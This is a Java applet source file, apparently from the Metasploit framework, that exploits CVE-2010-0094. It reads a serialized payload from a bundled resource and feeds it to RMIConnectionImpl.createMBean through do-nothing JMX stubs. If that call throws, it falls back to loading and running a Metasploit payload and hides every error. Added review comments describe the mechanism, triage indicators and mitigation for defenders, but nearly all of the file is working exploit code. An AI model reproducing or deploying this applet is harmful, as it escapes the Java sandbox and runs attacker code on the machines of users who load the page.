Path: blob/master/external/source/exploits/CVE-2010-0094/Exploit.java
import java.applet.Applet;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.rmi.MarshalledObject;
import java.rmi.Remote;
import java.util.Set;

import javax.management.Attribute;
import javax.management.AttributeList;
import javax.management.AttributeNotFoundException;
import javax.management.InstanceAlreadyExistsException;
import javax.management.InstanceNotFoundException;
import javax.management.IntrospectionException;
import javax.management.InvalidAttributeValueException;
import javax.management.ListenerNotFoundException;
import javax.management.MBeanException;
import javax.management.MBeanInfo;
import javax.management.MBeanRegistrationException;
import javax.management.MBeanServer;
import javax.management.NotCompliantMBeanException;
import javax.management.NotificationFilter;
import javax.management.NotificationListener;
import javax.management.ObjectInstance;
import javax.management.ObjectName;
import javax.management.OperationsException;
import javax.management.QueryExp;
import javax.management.ReflectionException;
import javax.management.loading.ClassLoaderRepository;
import javax.management.remote.rmi.RMIConnection;
import javax.management.remote.rmi.RMIConnectionImpl;
import javax.management.remote.rmi.RMIServerImpl;
import javax.security.auth.Subject;

import metasploit.Payload;

/**
 * This class exploits the vulnerability in the RMIConnectionImpl class by
 * loading the serialized PayloadClassloader. The repository path of this file
 * associates it with CVE-2010-0094.
 *
 * <p>
 * Structure, as visible in this file: {@link #init()} reads a serialized
 * {@link MarshalledObject} from the bundled resource {@code payload.ser},
 * wires an {@link RMIConnectionImpl} to a stubbed {@link RMIServerImpl} and a
 * stubbed {@link MBeanServer}, and passes the object as the {@code params}
 * argument of {@code RMIConnectionImpl.createMBean}. Neither stub does any
 * real work; they exist so the connection object can be constructed inside
 * the applet without a real JMX server.
 *
 * <p>
 * Review notes for defenders: the pattern to recognise is unsigned applet code
 * handing attacker-supplied serialized data to a JDK class that unmarshals it
 * on the caller's behalf. An applet archive that bundles a {@code .ser}
 * resource next to a class named like a class loader is a useful triage
 * indicator. Mitigation is the vendor JRE update that addresses this CVE and
 * not running untrusted applets. NOTE(review): the fixed JRE version is not
 * stated on this page; take it from the vendor advisory.
 *
 * @author mka
 *
 */
public class Exploit extends Applet {

    private static final long serialVersionUID = 2205862970052148546L;

    /**
     * Applet entry point. Builds the stubbed JMX objects and calls
     * {@code createMBean} with the deserialized {@code payload.ser} object as
     * its {@code params} argument.
     *
     * <p>
     * Any exception from that sequence leads to the fallback in the catch
     * block, which calls {@code PayloadClassLoader.instance.loadIt()} and then
     * {@code Payload.main(null)}. Exceptions from the fallback are silently
     * discarded, so this method never reports a failure.
     */
    @Override
    public void init() {
        try {

            // Raw MarshalledObject read from the bundled resource; see getPayload().
            MarshalledObject params = this.getPayload();

            // Both collaborators are do-nothing stubs (see the factory methods below).
            RMIServerImpl impl = getRMIServerImpl();
            impl.setMBeanServer(getMbeanServer());
            RMIConnectionImpl connectionImpl = new RMIConnectionImpl(impl,
                    "metasploit", null, null, null);

            // The serialized object travels as the `params` argument. The class
            // Javadoc attributes the vulnerability to RMIConnectionImpl.
            // NOTE(review): presumably the unmarshalling of `params` inside this
            // call is the vulnerable step; it is not visible in this file.
            connectionImpl.createMBean("PayloadClassLoader", null, null,
                    params, null, null);

        } catch (Exception e) {
            // NOTE(review): with a stub MBeanServer that returns null everywhere,
            // this branch looks like the expected path rather than an error path;
            // confirm against PayloadClassLoader, which is not shown here.
            try {

                // PayloadClassLoader.instance is a static defined elsewhere;
                // presumably it is set as a side effect of deserialization (TODO confirm).
                PayloadClassLoader.instance.loadIt();
                Payload.main(null);
            } catch (Exception e1) {
                // Intentionally empty in the original: every failure is swallowed.
            }

        }

    }

    /**
     * Returns an anonymous {@link MBeanServer} in which every method is a
     * no-op or returns {@code null} / {@code false}. The only non-null return
     * is {@link MBeanServer#getClassLoaderRepository()}, which yields a
     * repository whose three load methods all return {@code null}.
     *
     * <p>
     * It is installed on the stub server in {@link #init()} via
     * {@code setMBeanServer}.
     */
    private MBeanServer getMbeanServer() {

        return new MBeanServer() {

            @Override
            public void unregisterMBean(ObjectName name)
                    throws InstanceNotFoundException,
                    MBeanRegistrationException {
            }

            @Override
            public AttributeList setAttributes(ObjectName name,
                    AttributeList attributes) throws InstanceNotFoundException,
                    ReflectionException {
                return null;
            }

            @Override
            public void setAttribute(ObjectName name, Attribute attribute)
                    throws InstanceNotFoundException,
                    AttributeNotFoundException, InvalidAttributeValueException,
                    MBeanException, ReflectionException {
            }

            @Override
            public void removeNotificationListener(ObjectName name,
                    NotificationListener listener, NotificationFilter filter,
                    Object handback) throws InstanceNotFoundException,
                    ListenerNotFoundException {
            }

            @Override
            public void removeNotificationListener(ObjectName name,
                    ObjectName listener, NotificationFilter filter,
                    Object handback) throws InstanceNotFoundException,
                    ListenerNotFoundException {
            }

            @Override
            public void removeNotificationListener(ObjectName name,
                    NotificationListener listener)
                    throws InstanceNotFoundException, ListenerNotFoundException {
            }

            @Override
            public void removeNotificationListener(ObjectName name,
                    ObjectName listener) throws InstanceNotFoundException,
                    ListenerNotFoundException {
            }

            @Override
            public ObjectInstance registerMBean(Object object, ObjectName name)
                    throws InstanceAlreadyExistsException,
                    MBeanRegistrationException, NotCompliantMBeanException {
                return null;
            }

            @Override
            public Set<ObjectName> queryNames(ObjectName name, QueryExp query) {
                return null;
            }

            @Override
            public Set<ObjectInstance> queryMBeans(ObjectName name,
                    QueryExp query) {
                return null;
            }

            @Override
            public boolean isRegistered(ObjectName name) {
                return false;
            }

            @Override
            public boolean isInstanceOf(ObjectName name, String className)
                    throws InstanceNotFoundException {
                return false;
            }

            @Override
            public Object invoke(ObjectName name, String operationName,
                    Object[] params, String[] signature)
                    throws InstanceNotFoundException, MBeanException,
                    ReflectionException {
                return null;
            }

            @Override
            public Object instantiate(String className, ObjectName loaderName,
                    Object[] params, String[] signature)
                    throws ReflectionException, MBeanException,
                    InstanceNotFoundException {
                return null;
            }

            @Override
            public Object instantiate(String className, Object[] params,
                    String[] signature) throws ReflectionException,
                    MBeanException {
                return null;
            }

            @Override
            public Object instantiate(String className, ObjectName loaderName)
                    throws ReflectionException, MBeanException,
                    InstanceNotFoundException {
                return null;
            }

            @Override
            public Object instantiate(String className)
                    throws ReflectionException, MBeanException {
                return null;
            }

            @Override
            public ObjectInstance getObjectInstance(ObjectName name)
                    throws InstanceNotFoundException {
                return null;
            }

            @Override
            public MBeanInfo getMBeanInfo(ObjectName name)
                    throws InstanceNotFoundException, IntrospectionException,
                    ReflectionException {
                return null;
            }

            @Override
            public Integer getMBeanCount() {
                return null;
            }

            @Override
            public String[] getDomains() {
                return null;
            }

            @Override
            public String getDefaultDomain() {
                return null;
            }

            // The one method that returns an object: a repository stub whose
            // lookups all return null.
            @Override
            public ClassLoaderRepository getClassLoaderRepository() {

                return new ClassLoaderRepository() {

                    @Override
                    public Class<?> loadClassWithout(ClassLoader exclude,
                            String className) throws ClassNotFoundException {
                        return null;
                    }

                    @Override
                    public Class<?> loadClassBefore(ClassLoader stop,
                            String className) throws ClassNotFoundException {
                        return null;
                    }

                    @Override
                    public Class<?> loadClass(String className)
                            throws ClassNotFoundException {
                        return null;
                    }
                };
            }

            @Override
            public ClassLoader getClassLoaderFor(ObjectName mbeanName)
                    throws InstanceNotFoundException {
                return null;
            }

            @Override
            public ClassLoader getClassLoader(ObjectName loaderName)
                    throws InstanceNotFoundException {
                return null;
            }

            @Override
            public AttributeList getAttributes(ObjectName name,
                    String[] attributes) throws InstanceNotFoundException,
                    ReflectionException {
                return null;
            }

            @Override
            public Object getAttribute(ObjectName name, String attribute)
                    throws MBeanException, AttributeNotFoundException,
                    InstanceNotFoundException, ReflectionException {
                return null;
            }

            @Override
            public ObjectInputStream deserialize(String className,
                    ObjectName loaderName, byte[] data)
                    throws InstanceNotFoundException, OperationsException,
                    ReflectionException {
                return null;
            }

            @Override
            public ObjectInputStream deserialize(String className, byte[] data)
                    throws OperationsException, ReflectionException {
                return null;
            }

            @Override
            public ObjectInputStream deserialize(ObjectName name, byte[] data)
                    throws InstanceNotFoundException, OperationsException {
                return null;
            }

            @Override
            public ObjectInstance createMBean(String className,
                    ObjectName name, ObjectName loaderName, Object[] params,
                    String[] signature) throws ReflectionException,
                    InstanceAlreadyExistsException, MBeanRegistrationException,
                    MBeanException, NotCompliantMBeanException,
                    InstanceNotFoundException {
                return null;
            }

            @Override
            public ObjectInstance createMBean(String className,
                    ObjectName name, Object[] params, String[] signature)
                    throws ReflectionException, InstanceAlreadyExistsException,
                    MBeanRegistrationException, MBeanException,
                    NotCompliantMBeanException {
                return null;
            }

            @Override
            public ObjectInstance createMBean(String className,
                    ObjectName name, ObjectName loaderName)
                    throws ReflectionException, InstanceAlreadyExistsException,
                    MBeanRegistrationException, MBeanException,
                    NotCompliantMBeanException, InstanceNotFoundException {
                return null;
            }

            @Override
            public ObjectInstance createMBean(String className, ObjectName name)
                    throws ReflectionException, InstanceAlreadyExistsException,
                    MBeanRegistrationException, MBeanException,
                    NotCompliantMBeanException {
                return null;
            }

            @Override
            public void addNotificationListener(ObjectName name,
                    ObjectName listener, NotificationFilter filter,
                    Object handback) throws InstanceNotFoundException {
            }

            @Override
            public void addNotificationListener(ObjectName name,
                    NotificationListener listener, NotificationFilter filter,
                    Object handback) throws InstanceNotFoundException {
            }
        };
    }

    /**
     * Returns an anonymous {@link RMIServerImpl} constructed with a
     * {@code null} environment. Every abstract method is stubbed to do nothing
     * or return {@code null}, so nothing is exported and no client connection
     * is made by this object.
     */
    private RMIServerImpl getRMIServerImpl() {

        return new RMIServerImpl(null) {

            @Override
            public Remote toStub() throws IOException {
                return null;
            }

            @Override
            protected RMIConnection makeClient(String connectionId,
                    Subject subject) throws IOException {
                return null;
            }

            @Override
            protected String getProtocol() {
                return null;
            }

            @Override
            protected void export() throws IOException {
            }

            @Override
            protected void closeServer() throws IOException {
            }

            @Override
            protected void closeClient(RMIConnection client) throws IOException {
            }
        };

    }

    /**
     * Reads one serialized object from the class-relative resource
     * {@code payload.ser} and returns it cast to {@link MarshalledObject}.
     *
     * <p>
     * NOTE(review): the stream is closed only on the success path, so a
     * failing {@code readObject()} leaves it open. If the resource is missing,
     * {@code getResourceAsStream} returns {@code null} and the
     * {@code ObjectInputStream} constructor throws; {@link #init()} catches
     * that along with every other exception.
     *
     * @return the deserialized object (raw {@code MarshalledObject} type)
     * @throws IOException            if the stream cannot be read
     * @throws ClassNotFoundException if a class in the stream cannot be resolved
     */
    public MarshalledObject getPayload() throws IOException,
            ClassNotFoundException {

        InputStream f = super.getClass().getResourceAsStream("payload.ser");
        ObjectInputStream stream = new ObjectInputStream(f);
        // The cast fails with ClassCastException if the resource holds any other type.
        MarshalledObject object = (MarshalledObject) stream.readObject();
        stream.close();
        return object;

    }
}